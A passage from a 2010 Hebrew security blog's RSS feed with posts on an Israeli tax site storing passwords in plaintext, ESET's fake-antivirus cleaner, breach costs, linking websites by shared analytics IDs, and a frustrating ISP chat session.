		<description><![CDATA[&#8235;בעלי עסקים מכירים את העניין של ללכת לשלם מע&#34;מ ב-15 לחודש בכל חודש או  חודשיים.
כשפתחתי את תיק העוסק שלי גיליתי שדברים השתנו וניתן לשלם מע&#34;מ דרך האינטרנט  באתר של רשות המיסים: https://www.shaam.gov.il/Shaam_internet.
זה שיפור עצום שלא צריך ללכת לבזבז זמן בדואר והם גם נותנים לכם את האפשרות לשלם  ב-19 לחודש במקום ב-15. זה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fmaam-site-password&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בעלי עסקים מכירים את העניין של ללכת לשלם מע&quot;מ ב-15 לחודש בכל חודש או  חודשיים.</p>
<p>כשפתחתי את תיק העוסק שלי גיליתי שדברים השתנו וניתן לשלם מע&quot;מ דרך האינטרנט  באתר של רשות המיסים: <a href="https://www.shaam.gov.il/Shaam_internet/" target="_blank">https://www.shaam.gov.il/Shaam_internet</a>.</p>
<p>זה שיפור עצום שלא צריך ללכת לבזבז זמן בדואר והם גם נותנים לכם את האפשרות לשלם  ב-19 לחודש במקום ב-15. זה לא רע.</p>
<p>הרישום לשירות קליל אבל בסיום התהליך נדלקה לי נורת אזהרה כלשהי..</p>
<p>הדף המסכם הציג הודעה שהקוד שלי הוא XXX והסיסמה האישית שלי היא YYY. האם יכול  להיות שהם שומרים את הסיסמה גלויה ולא מוצפנת ב-DB?</p>
<p>איך נברר את העניין? מעניין.</p>
<p>שיחת טלפון אל התמיכה. שכחתי סיסמה.</p>
<p>החבר'ה ביקשו ממני את מזהה המשתמש והסיסמה. <strong>הם ביקשו ממני את  הסיסמה!</strong></p>
<p>כשאמרתי להם את הסיסמה (היא הוחלפה מראש כך שלא ראיתי בכך בעיית אבטחה) הם אמרו  לי שהסיסמה הוחלפה ונתנו לי את הסיסמה החדשה!</p>
<p>אכן &#8211; הסיסמה שמורה ללא הצפנה ב-DB. התומכים יכולים לראות את הסיסמאות שלנו.</p>
<p>חשוב להגיד:</p>
<p>1. יש הליך &quot;קצר&quot; לאחזור סיסמה. אתם נדרשים לענות על הפרטים הבאים:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/05/2.png"><img class="aligncenter size-full wp-image-1486" title="שחזור סיסמה באתר מעמ" src="http://guym.co.il/wp-content/uploads/2010/05/2.png" alt="שחזור סיסמה באתר מעמ" width="812" height="657" /></a>חשוב להגיד שמספיק שטעיתם בפרט יחיד ולא תוכלו לשחזר סיסמה דרך האתר. אבטחה –  10. שימושיות – 0.</p>
<p>עוד נושא שרציתי להעלות כאן הוא הנושא הזה:</p>
<p><a href="http://guym.co.il/wp-content/uploads/2010/05/3.png"><img class="aligncenter size-full wp-image-1491" title="כניסה לאתר מעמ" src="http://guym.co.il/wp-content/uploads/2010/05/3.png" alt="כניסה לאתר מעמ" width="487" height="344" /></a></p>
<p>הרבה אתרים רשמיים דואגים לייצר מין הזדהות כפולה שכזו.</p>
<p>מספר תיק עוסק זה קל לגלות ומופיע בכל חשבונית כך שזה אינו יכול להיחשב כפרט  מוסתר.</p>
<p>קוד משתמש וסיסמה הם פקטורי ההזדהות.</p>
<p>באותה שיחה שיזמתי שאלתי אם משנה אם התווים גדולים או קטנים בשם ובסיסמה. התשובה  היתה שזה לא משנה.</p>
<p>מעניין.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fmaam-site-password&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%91%D7%98%D7%97%D7%94+%D7%A9%D7%9C+%D7%90%D7%AA%D7%A8+%D7%A8%D7%90%D7%A9%D7%95%D7%AA+%D7%94%D7%9E%D7%99%D7%A1%D7%99%D7%9D+http://bit.ly/dqDV4l" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/maam-site-password/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>&#8235;ERACleaner &#8211; כלי לניקוי אנטיוירוסים מתחזים&#8236;</title>		<link>http://guym.co.il/eracleaner/?nucrss=1</link>
		<comments>http://guym.co.il/eracleaner/#comments</comments>
		<pubDate>Mon, 17 May 2010 11:23:38 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1474</guid>
		<description><![CDATA[&#8235;כפיר טויטו מחברת קומסקיור שלח לי הודעה על כך ש-ESET הוציאה כלי מעניין שאמור לנקות את כל אותם אנטיוירוסים מתחזים.
ציטוט:
&#34; כלי זה יצא בעקבות ריבוי מקרה ההונאה של תוכנות אנטי וירוס מזויפות המתחזות לתוכנות לגיטימיות ותוקפות גולשים תמימים, בשנים האחרונות, ובמיוחד בשנת 2009, הייתה עליה חדה בנוזקות המתחזות לתוכנות אנטי וירוס לגיטימיות.
תופעה זו, אשר זכתה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Feracleaner&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p><strong>כפיר טויטו</strong> מחברת <a href="http://www.eset.co.il" target="_blank">קומסקיור</a> שלח לי הודעה על כך ש-ESET הוציאה כלי מעניין שאמור לנקות את כל אותם אנטיוירוסים מתחזים.</p>
<p>ציטוט:</p>
<p>&quot; כלי זה יצא בעקבות ריבוי מקרה ההונאה של תוכנות אנטי וירוס מזויפות המתחזות לתוכנות לגיטימיות ותוקפות גולשים תמימים, בשנים האחרונות, ובמיוחד בשנת 2009, הייתה עליה חדה בנוזקות המתחזות לתוכנות אנטי וירוס לגיטימיות.</p>
<p>תופעה זו, אשר זכתה לכינוי ScareWare בפי מומחי אבטחת מידע בעולם, ממשיכה לצמוח ולפי מחקר שנערך ופורסם לאחרונה על ידי גוגל, 15% מכלל הנוזקות ברשת הן תוכנות אנטי וירוס מזויפות – בשנה האחרונה הייתה עליה של 400% בנוזקות אלו.&quot;</p>
<p><a href="http://download.eset.com/special/ERACleaner.exe" target="_self">הורדת ERACleaner.</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Feracleaner&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=ERACleaner+%E2%80%93+%D7%9B%D7%9C%D7%99+%D7%9C%D7%A0%D7%99%D7%A7%D7%95%D7%99+%D7%90%D7%A0%D7%98%D7%99%D7%95%D7%99%D7%A8%D7%95%D7%A1%D7%99%D7%9D+%D7%9E%D7%AA%D7%97%D7%96%D7%99%D7%9D+http://bit.ly/b6taIe" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/eracleaner/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>&#8235;אז מה כבר יקרה אם יפרצו לנו?&#8236;</title>		<link>http://guym.co.il/the-price-of-hack/?nucrss=1</link>
		<comments>http://guym.co.il/the-price-of-hack/#comments</comments>
		<pubDate>Sat, 15 May 2010 08:54:23 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[CISO]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[אבטחת מידע]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1466</guid>
		<description><![CDATA[&#8235;הוצאות על אבטחת מידע בארגונים רבים נתפסת כצעד הכרחי בגלל תקנים שהם חייבים לעמוד בהם.
כ-CISO קל לנו להראות שאנו חייבים לבצע הוצאות מסויימות כיוון שאם לא יבוצעו אז לא נעמוד בתקנים שונים שלעיתים הארגון חייב לעמוד בהם. עם זאת, בהרבה מקרים קשה ל-CISO באירגון לייצר מצב בו רואים ROI (החזר על הוצאה) בכסף שמושקע באבטחת [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fthe-price-of-hack&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>הוצאות על אבטחת מידע בארגונים רבים נתפסת כצעד הכרחי בגלל תקנים שהם חייבים לעמוד בהם.</p>
<p>כ-CISO קל לנו להראות שאנו חייבים לבצע הוצאות מסויימות כיוון שאם לא יבוצעו אז לא נעמוד בתקנים שונים שלעיתים הארגון חייב לעמוד בהם. עם זאת, בהרבה מקרים קשה ל-CISO באירגון לייצר מצב בו רואים ROI (החזר על הוצאה) בכסף שמושקע באבטחת מידע.</p>
<p>בינואר 2009 התפרסם שחברת <a href="http://www.heartlandpaymentsystems.com/" target="_blank">Heartland Payment Systems</a> סבלה מהתקפה שגרמה לה לאיבוד מידע.החברה שעוסקת בסליקת כרטיסי אשראי הצהירה שלא מדובר במידע מהותי כגון Social Security Numbers אך כן נגנבו 130 מיליון מספרי כרטיסי אשראי וכן שמות המחזיקים אותם. (<a href="http://www.msnbc.msn.com/id/28758856" target="_blank">http://www.msnbc.msn.com/id/28758856</a>/).</p>
<p>הפרצה הזו עלתה לחברה מעל 140 מליון דולר עד עכשיו:</p>
<p>60 מליון דולר הסדר עם חברת ויזה, 3.5 מילין דולר לאמריקאן אקספרס, 26 מיליון בתביעות משפטיות כאלה ואחרות.</p>
<p>עוד 42 מיליון דולר החברה שמה בצד לצורך תשלומי תביעות עתידיות.</p>
<p>עלות נוספת משמעותית היא הפסד הכנסות מעסקים &#8211; חברות פשוט הפסיקו להשתמש בשירותי החברה בשל הפריצה.</p>
<p>כשרואים את הסכומים מבינים די בקלות שניתן להצדיק הוצאות על אבטחת מידע כיוון שיש להם ROI ברור: כל עוד לא פרצו לא הפסדנו כסף אך גם כשכבר פורצים חס וחלילה &#8211; ככל שנאבד פחות מידע, ככל שמערכות שונות יגבילו את התוקף ניפגע פחות כתוצאה מתשלום פיצויים.עכשיו נשאר רק להציג את זה נכון למקבלי ההחלטות <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fthe-price-of-hack&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%90%D7%96+%D7%9E%D7%94+%D7%9B%D7%91%D7%A8+%D7%99%D7%A7%D7%A8%D7%94+%D7%90%D7%9D+%D7%99%D7%A4%D7%A8%D7%A6%D7%95+%D7%9C%D7%A0%D7%95%3F+http://bit.ly/ciof48" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/the-price-of-hack/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;זיהוי מספר אתרים ששייכים לאותו אדם או גוף&#8236;</title>		<link>http://guym.co.il/sites-to-single-person/?nucrss=1</link>
		<comments>http://guym.co.il/sites-to-single-person/#comments</comments>
		<pubDate>Fri, 14 May 2010 15:27:25 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[מאמרים מקוריים]]></category>
		<category><![CDATA[WEB]]></category>
		<category><![CDATA[איסוף מידע]]></category>
		<category><![CDATA[טיפים]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1464</guid>
		<description><![CDATA[&#8235;חבר שאל אותי אתמול על כלי שמאפשר למצוא מספר אתרים השייכים לאותם בעלים.
בעבר מצאתי תוכנה חביבה שהיתה עושה את זה לא רע אבל התחלתי לחשוב איך אפשר לזהות את העניין.
הברור מאליו &#8211; רישום של שם הדומיין. הבעיה היא שיש הרבה אנשים שרושמים את הדומיין ללא זיהוי או בלי זיהוי אמיתי.
דרכים נוספות:
כל תוסף סטטיסטיקות או פרסומות [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fsites-to-single-person&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שאל אותי אתמול על כלי שמאפשר למצוא מספר אתרים השייכים לאותם בעלים.</p>
<p>בעבר מצאתי תוכנה חביבה שהיתה עושה את זה לא רע אבל התחלתי לחשוב איך אפשר לזהות את העניין.</p>
<p>הברור מאליו &#8211; רישום של שם הדומיין. הבעיה היא שיש הרבה אנשים שרושמים את הדומיין ללא זיהוי או בלי זיהוי אמיתי.</p>
<p>דרכים נוספות:</p>
<p>כל תוסף סטטיסטיקות או פרסומות והרבה תוספים אחרים מגיעים עם זיהוי ייחודי של בעל האתר. אחת הבעיות עם תוספים כמו אדסנס ואנאליטיקס הם שזיהוי המשתמש ייחודי לבעל האתר ולא לאתר עצמו.</p>
<p>כיוון שבכל האתרים יש את אותו משתמש (רוב האנשים לא טורחים לייצר לעצמם כמה חשבונות אנאליטיקס ואדסנס) ניתן לזהות כך כמה אתרים מפעיל אותו אדם.</p>
<p>דרך נוספת היא לבדוק כמה אתרים שיושבים על אותו IP (כמובן שזה ממש לא מדוייק. יכול להיות שזה שרת HOSTING ואז האתרים לא קשורים זה לזה).</p>
<p>ישנו אתר חביב שעושה את העניין פשוט: <a href="http://spyonweb.com" target="_blank">http://spyonweb.com</a>.</p>
<p>אם תבדקו את האתר שלי שם תוכלו לראות עוד כמה וכמה אתרים שהייתי מעורב בהם בצורה כלשהי: <a href="http://spyonweb.com/guym.co.il" target="_self">http://spyonweb.com/guym.co.il</a>.</p>
<p>נסו לבדוק אתרים אחרים שאתם מכירים. הרבה פעמים תופתעו מהתוצאות.</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fsites-to-single-person&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%96%D7%99%D7%94%D7%95%D7%99+%D7%9E%D7%A1%D7%A4%D7%A8+%D7%90%D7%AA%D7%A8%D7%99%D7%9D+%D7%A9%D7%A9%D7%99%D7%99%D7%9B%D7%99%D7%9D+%D7%9C%D7%90%D7%95%D7%AA%D7%95+%D7%90%D7%93%D7%9D+%D7%90%D7%95+%D7%92%D7%95%D7%A3+http://bit.ly/aZuq38" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/sites-to-single-person/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>&#8235;צריכים עבודה?&#8236;</title>		<link>http://guym.co.il/%d7%a6%d7%a8%d7%99%d7%9b%d7%99%d7%9d-%d7%a2%d7%91%d7%95%d7%93%d7%94/?nucrss=1</link>
		<comments>http://guym.co.il/%d7%a6%d7%a8%d7%99%d7%9b%d7%99%d7%9d-%d7%a2%d7%91%d7%95%d7%93%d7%94/#comments</comments>
		<pubDate>Fri, 07 May 2010 03:36:16 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1455</guid>
		<description><![CDATA[&#8235;חבר שלי מחפש עובדים.
פרטים פה:

.prezi-player { width: 550px; } .prezi-player-links { text-align: center; }


CrowdSpot is hiring amazing tech people on Prezi


<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%25a6%25d7%25a8%25d7%2599%25d7%259b%25d7%2599%25d7%259d-%25d7%25a2%25d7%2591%25d7%2595%25d7%2593%25d7%2594&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>חבר שלי מחפש עובדים.<br />
פרטים פה:</p>
<div class="prezi-player">
<style type="text/css" media="screen">.prezi-player { width: 550px; } .prezi-player-links { text-align: center; }</style>
<p><object id="prezi_78pwoyg8b4ix" name="prezi_78pwoyg8b4ix" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="550" height="400"><param name="movie" value="http://prezi.com/bin/preziloader.swf"/><param name="allowfullscreen" value="true"/><param name="allowscriptaccess" value="always"/><param name="bgcolor" value="#ffffff"/><param name="flashvars" value="prezi_id=78pwoyg8b4ix&amp;lock_to_path=1&amp;color=ffffff&amp;autoplay=no"/><embed id="preziEmbed_78pwoyg8b4ix" name="preziEmbed_78pwoyg8b4ix" src="http://prezi.com/bin/preziloader.swf" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="550" height="400" bgcolor="#ffffff" flashvars="prezi_id=78pwoyg8b4ix&amp;lock_to_path=1&amp;color=ffffff&amp;autoplay=no"></embed></object>
<div class="prezi-player-links">
<p><a title="Click on the play button to look for further information" href="http://prezi.com/78pwoyg8b4ix/crowdspot-is-hiring-amazing-tech-people/">CrowdSpot is hiring amazing tech people</a> on <a href="http://prezi.com">Prezi</a></p>
</div>
</div>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2F%25d7%25a6%25d7%25a8%25d7%2599%25d7%259b%25d7%2599%25d7%259d-%25d7%25a2%25d7%2591%25d7%2595%25d7%2593%25d7%2594&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=%D7%A6%D7%A8%D7%99%D7%9B%D7%99%D7%9D+%D7%A2%D7%91%D7%95%D7%93%D7%94%3F+http://bit.ly/cw01Se" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/%d7%a6%d7%a8%d7%99%d7%9b%d7%99%d7%9d-%d7%a2%d7%91%d7%95%d7%93%d7%94/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>&#8235;Chrome החדש מהיר.&#8236;</title>		<link>http://guym.co.il/chrome-%d7%94%d7%97%d7%93%d7%a9-%d7%9e%d7%94%d7%99%d7%a8/?nucrss=1</link>
		<comments>http://guym.co.il/chrome-%d7%94%d7%97%d7%93%d7%a9-%d7%9e%d7%94%d7%99%d7%a8/#comments</comments>
		<pubDate>Thu, 06 May 2010 10:33:37 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1406</guid>
		<description><![CDATA[&#8235;יובל דרור צייץ על זה ב-TWITTER והפרסומת הזאת מדגישה את זה.

אז אם פרטיות לא מעניינת אתכם (וזה בסדר מבחינתכם גם כשאתם יודעים מה גוגל יודעת עליכם), כדאי להוריד..
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fchrome-%25d7%2594%25d7%2597%25d7%2593%25d7%25a9-%25d7%259e%25d7%2594%25d7%2599%25d7%25a8&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>יובל דרור צייץ על זה ב-TWITTER והפרסומת הזאת מדגישה את זה.<br />
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://www.youtube.com/v/nCgQDjiotG0&amp;color1=0xb1b1b1&amp;color2=0xd0d0d0&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="640" height="385" src="http://www.youtube.com/v/nCgQDjiotG0&amp;color1=0xb1b1b1&amp;color2=0xd0d0d0&amp;hl=en_US&amp;feature=player_embedded&amp;fs=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>אז אם פרטיות לא מעניינת אתכם (וזה בסדר מבחינתכם גם כשאתם יודעים <a href="http://guym.co.il/what-google-knows-about-you/" target="_blank">מה גוגל יודעת עליכם</a>), כדאי להוריד..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fchrome-%25d7%2594%25d7%2597%25d7%2593%25d7%25a9-%25d7%259e%25d7%2594%25d7%2599%25d7%25a8&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=Chrome+%D7%94%D7%97%D7%93%D7%A9+%D7%9E%D7%94%D7%99%D7%A8.+http://bit.ly/cjrpXY" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/chrome-%d7%94%d7%97%d7%93%d7%a9-%d7%9e%d7%94%d7%99%d7%a8/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>&#8235;How Strong is your Fu?&#8236;</title>		<link>http://guym.co.il/how-strong-is-your-foo/?nucrss=1</link>
		<comments>http://guym.co.il/how-strong-is-your-foo/#comments</comments>
		<pubDate>Wed, 05 May 2010 04:58:12 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1402</guid>
		<description><![CDATA[&#8235;למי שעוד לא שמע &#8211; יש תחרות האקינג מגניבה לחלוטין שמארגן צוות Offensive Security.
התחרות נקראת How strong is your Fu? והיא נראית מגניבה לגמרי.
פרטים נוספים פה:
http://www.information-security-training.com/events/offensive-security-hacking-tournament-updates/
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhow-strong-is-your-foo&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>למי שעוד לא שמע &#8211; יש תחרות האקינג מגניבה לחלוטין שמארגן צוות Offensive Security.</p>
<p>התחרות נקראת <a href="http://www.information-security-training.com/news/offensive-security-hacking-tournament/" target="_blank">How strong is your Fu?</a> והיא נראית מגניבה לגמרי.</p>
<p>פרטים נוספים פה:</p>
<p><a href="http://www.information-security-training.com/events/offensive-security-hacking-tournament-updates/" target="_blank">http://www.information-security-training.com/events/offensive-security-hacking-tournament-updates/</a></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fhow-strong-is-your-foo&crtId=148&dt=1283481169"><p align="left"><a class="tt" href="http://twitter.com/home/?status=How+Strong+is+your+Fu%3F+http://bit.ly/aRy6WM" title="Post to Twitter"><img class="nothumb" src="http://guym.co.il/wp-content/plugins/tweet-this/icons/tt-twitter-big4.png" alt="Post to Twitter" /></a></p></div>]]></content:encoded>			<wfw:commentRss>http://guym.co.il/how-strong-is-your-foo/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>&#8235;TO HOT OR NOT (או חוויית קבלת מענה בצ&#039;אט)&#8236;</title>		<link>http://guym.co.il/to-hot-or-not-%d7%90%d7%95-%d7%97%d7%95%d7%95%d7%99%d7%99%d7%aa-%d7%a7%d7%91%d7%9c%d7%aa-%d7%9e%d7%a2%d7%a0%d7%94-%d7%91%d7%a6%d7%90%d7%98/?nucrss=1</link>
		<comments>http://guym.co.il/to-hot-or-not-%d7%90%d7%95-%d7%97%d7%95%d7%95%d7%99%d7%99%d7%aa-%d7%a7%d7%91%d7%9c%d7%aa-%d7%9e%d7%a2%d7%a0%d7%94-%d7%91%d7%a6%d7%90%d7%98/#comments</comments>
		<pubDate>Mon, 03 May 2010 11:59:20 +0000</pubDate>
		<dc:creator>&#8235;גיא מזרחי&#8236;</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://guym.co.il/?p=1399</guid>
		<description><![CDATA[&#8235;ניסיתי היום לברר מחיר לחבילה של אינטרנט, טלפון וטלוויזיה ב-HOT.
נכנסתי לאתר שלהם והופתעתי לראות שיש אפשרות לקבלת מענה בצ'אט. חשבתי לעצמי &#34;הממממ&#8230; אפשר לכתוב על זה אח&#34;כ&#34;.
תיארתי לי מראש שזה הולך להיות בעייתי אבל מה לא אעשה בשביל קוראי האהובים?
אז שינסתי מותני, אזרתי אומץ ולחצתי על הכפתור.
קודם כל &#8211; אני עם FIREFOX והאתר עבד. הפתעה [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fguym.co.il%2Fto-hot-or-not-%25d7%2590%25d7%2595-%25d7%2597%25d7%2595%25d7%2595%25d7%2599%25d7%2599%25d7%25aa-%25d7%25a7%25d7%2591%25d7%259c%25d7%25aa-%25d7%259e%25d7%25a2%25d7%25a0%25d7%2594-%25d7%2591%25d7%25a6%25d7%2590%25d7%2598&crtId=148&dt=1283481169">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>ניסיתי היום לברר מחיר לחבילה של אינטרנט, טלפון וטלוויזיה ב-HOT.</p>
<p>נכנסתי לאתר שלהם והופתעתי לראות שיש אפשרות לקבלת מענה בצ'אט. חשבתי לעצמי &quot;הממממ&#8230; אפשר לכתוב על זה אח&quot;כ&quot;.</p>
<p>תיארתי לי מראש שזה הולך להיות בעייתי אבל מה לא אעשה בשביל קוראי האהובים?</p>
<p>אז שינסתי מותני, אזרתי אומץ ולחצתי על הכפתור.</p>
<p>קודם כל &#8211; אני עם FIREFOX והאתר עבד. הפתעה נעימה <img src='http://guym.co.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>פתאום הפתעה פחות נעימה: כל הדפדפן הוקטן למימדים מזעריים ונפתח חלון צ'אט זוועתי.</p>
<p>ענתה לי אשת מכירות והתחלנו להתכתב.</p>
<p>אני כתבתי משפט בשנייה או שתיים, אולי שלוש. אז המתנתי 50-60 שניות ואז הופיעה כיתוב שמראה שאשת המכירות עונה. כן, לקח לה כמעט דקה לענות.</p>
<p>אם תהיתם: זה לא היה חד פעמי. בכל פעם זמן ההמתנה לתגובה היא בין 40 שניות במקרה הטוב ל-60 שניות במקרה הפחות נחמד.</p>
<p>כל שאלה הייתי צריך לנסח כמה פעמים. רוצים דוגמאות? טוב..</p>
<p>גיא: אני רוצה לקבל מחיר ללא התחייבות.</p>
<p>שרי: חבילה של כל הערוצים ואינטרנט עד 12M ו1000 דקות לטלפון תעלה לך 260 ש&quot;ח בהתחייבות ל-36 חודשים. התקנה 100 ש&quot;ח.</p>
<p>גיא: אני לא רוצה התחייבות. אפילו לא לחודש.</p>
<p>שרי: בלי התחייבות תשלם מחיר מחירון.</p>
<p>גיא: מה מחיר המחירון?</p>
<p>שרי: חבילת בסיס + 6 חבילות 260 ש&quot;ח. לא כולל ממירים.</p>
<p>גיא: כמה עולה שכירות לממירים?</p>
<p>לא היתה תגובה מעל 90 שניות ואז התעצבנתי וניתקתי.</p>
<p>בקיצור: אי אפשר לקבל שירות סביר באמצעות צ'אט. אי אפשר לקבל תגובות סבירות כי הנציגה לא קוראת מה אתם רוצים. היא ממלאת אתכם בהצעות מוכנות ואם צריך משהו שונה&#8230; זו בעיה.</p>
<p>מצד שני, יכול להיות שגם בשיחת טלפון זה ככה. אני לא בטוח שאתקשר לבדוק.</p>
